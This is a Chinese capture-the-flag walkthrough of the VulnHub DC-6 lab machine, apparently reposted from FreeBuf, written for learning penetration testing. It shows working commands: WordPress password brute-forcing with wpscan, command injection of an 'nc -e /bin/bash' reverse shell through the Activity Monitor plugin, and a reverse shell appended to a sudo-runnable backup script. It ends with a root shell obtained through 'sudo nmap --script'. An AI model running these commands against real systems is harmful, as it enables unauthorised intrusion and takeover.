VulnHub-DC:6-靶机渗透学习 – 作者:DXR嗯嗯呐

靶机地址:https://www.vulnhub.com/entry/dc-6,315/

靶机难度:中级(CTF)

靶机发布日期:2019年4月26日

靶机描述:

DC-6是基于Debian 64位构建的VirtualBox VM,但是在大多数PC上运行它应该没有任何问题。我已经在VMWare Player上对此进行了测试,但是如果在VMware中运行此VM时遇到任何问题,请通读此书。当前已将其配置为桥接网络,但是,可以根据您的要求进行更改。为DHCP配置了网络。安装非常简单-下载它,解压缩,然后将其导入VirtualBox或VMWare,然后就可以使用了。

注意:您将需要在渗透测试设备上编辑主机文件,以使其读取如下内容:

192.168.0.142 wordy

注意:我以192.168.0.142为例。您需要使用常规方法确定VM的IP地址,并进行相应的调整。

这个非常重要。

是的,这是另一个基于WordPress的VM(尽管只有我的第二个)

目标:得到root权限&找到flag.txt

作者:DRX嗯嗯呐

信息收集 

nmap扫描靶机IP

1611285281_600a4321d4db70b15d37c.png!small?1611285283137

根据提示配置kail机上hosts文件

1611285288_600a43284fbdb5f27e613.png!small?1611285290046

nmap端口扫描

1611285293_600a432d9faf8c8e2483a.png!small?1611285294992

访问域名80端口

1611285304_600a4338869669e79f208.png!small?1611285310825

又是一个wordpress框架,先用dirb爆破

1611285310_600a433e566344381e96f.png!small?1611285311469

再使用wpscan枚举一下账号

wpscan –url ‘http://wordy/‘ –api-token ‘API’ –enumerate u

1611285319_600a43477c9ea57a23404.png!small?1611285320755

继续使用wpscan爆破一下密码

首先根据作者提示,缩小密码的范围

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

1611285337_600a43595d5f4ad6790ae.png!small?1611285339354

1611285348_600a4364d8ec361c3fa47.png!small?1611285349883

使用wpscan爆破密码

wpscan –url ‘http://wordy/‘ –api-token ‘API’ -U wordpressusers.txt -P passwords.txt

1611285358_600a436e411ed75e7d307.png!small?1611285359552

mark / helpdesk01

WordPress Activity monitor 远程代码执行

访问前面dirb扫描目录登陆账号

http://wordy/wp-login.php

1611285378_600a43824669887ffad99.png!small?1611285379577

发现Activity monitor插件存在一个远程代码执行漏洞

1611285388_600a438c5f45cc30f920a.png!small?1611285389519

在kail上也找到了

1611285394_600a4392da962857958aa.png!small?1611285395737

看一下html

我们可以看到是在tools模块下,填写IP表单,点击lookup提交实现远程代码执行的

1611285446_600a43c699f4a1d194f1a.png!small?1611285449054

测试一下看看

1611285463_600a43d791862077745e9.png!small?1611285465306

远程代码执行成功

1611285469_600a43dd8c7d9e2567f59.png!small?1611285470504

看看可不可以直接使用nc -e获得远程shell

因为输入限制,我们通过F12直接将我们想要输入的命令输入到html界面中,提交获得shell。

google.fr| nc -e /bin/bash 192.168.16.143 1234

1611285477_600a43e51cbb53b3e2dc6.png!small?1611285479604

提权

登陆靶机,查看home目录下每个文件

1611285487_600a43ef3c93e6c80c084.png!small?1611285488404

在jens目录下看到一个备份脚本,进去查看发现脚本内容为压缩html目录,同时这个文件的拥有者和用户所属组具(devs)备修改权限。

1611285493_600a43f5a775f028ec2c7.png!small?1611285494811

看一个这个用户所属组的信息,发现此用户组有两个用户

cat /etc/group

1611285513_600a4409800147e1fa620.png!small?1611285514580

在回去看home下的文件,发现在mark目录下有个txt文件

1611285521_600a4411de284fa9aed16.png!small?1611285522730

看一下文件内容

1611285534_600a441e53117c98b40e7.png!small?1611285535236

内容大概:添加新用户graham,GSo7isUM1D4可能是密码,登陆测试成功

1611285540_600a442473b1c8fc8fc2a.png!small?1611285541440

graham/GSo7isUM1D4

检查发现具备sudo权限,是上面的备份脚本

1611285561_600a44399c209e550c50e.png!small?1611285562669

因为graham为devs用户组,用户组对backups.sh文件具备修改权限,直接在backups.sh文件中新增一个nc反弹shell。

echo ‘nc -e /bin/bash 192.168.16.143 9999’ >> backups.sh

1611285567_600a443fac4028a725012.png!small?1611285568607

在kail上监听9999端口,sudo启动backups.sh脚本,获得jens权限

sudo -u jens ./backups.sh

1611285578_600a444ac8f08eb8c5f46.png!small?1611285580012

检查jens用户,发现nmap命令允许以root身份运行sudo

1611285600_600a4460d40b6f24440c3.png!small?1611285601783

使用sudo提权,获得root权限

TF=$(mktemp)

echo ‘os.execute(“/bin/sh”)’ > $TF

sudo nmap –script=$TF

1611285619_600a4473092a3e31a92dd.png!small?1611285620103

1611285623_600a4477c158addc5a766.png!small?1611285624802

获得flag

1611285628_600a447c536ae5d8a88a5.png!small?1611285629441

完成!!!

总结

1、nmap扫描靶机IP,根据作者提示,配置hosts文件,访问80端口,使用wpscan爆破wordpress账号密码。

2、登陆wordpress利用Activity monitor插件存在的远程代码执行漏洞,获得www-data权限,在mark目录下找到graham用户的密码,登陆。

3、因为graham和jens用户在同一用户组中,修改backups.sh脚本,使用sudo提权,获得jens权限。

4、在jens用户中利用nmap命令可以以root权限运行sudo,提权获得root权限。

来源:freebuf.com 2021-01-22 11:28:29 by: DXR嗯嗯呐

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论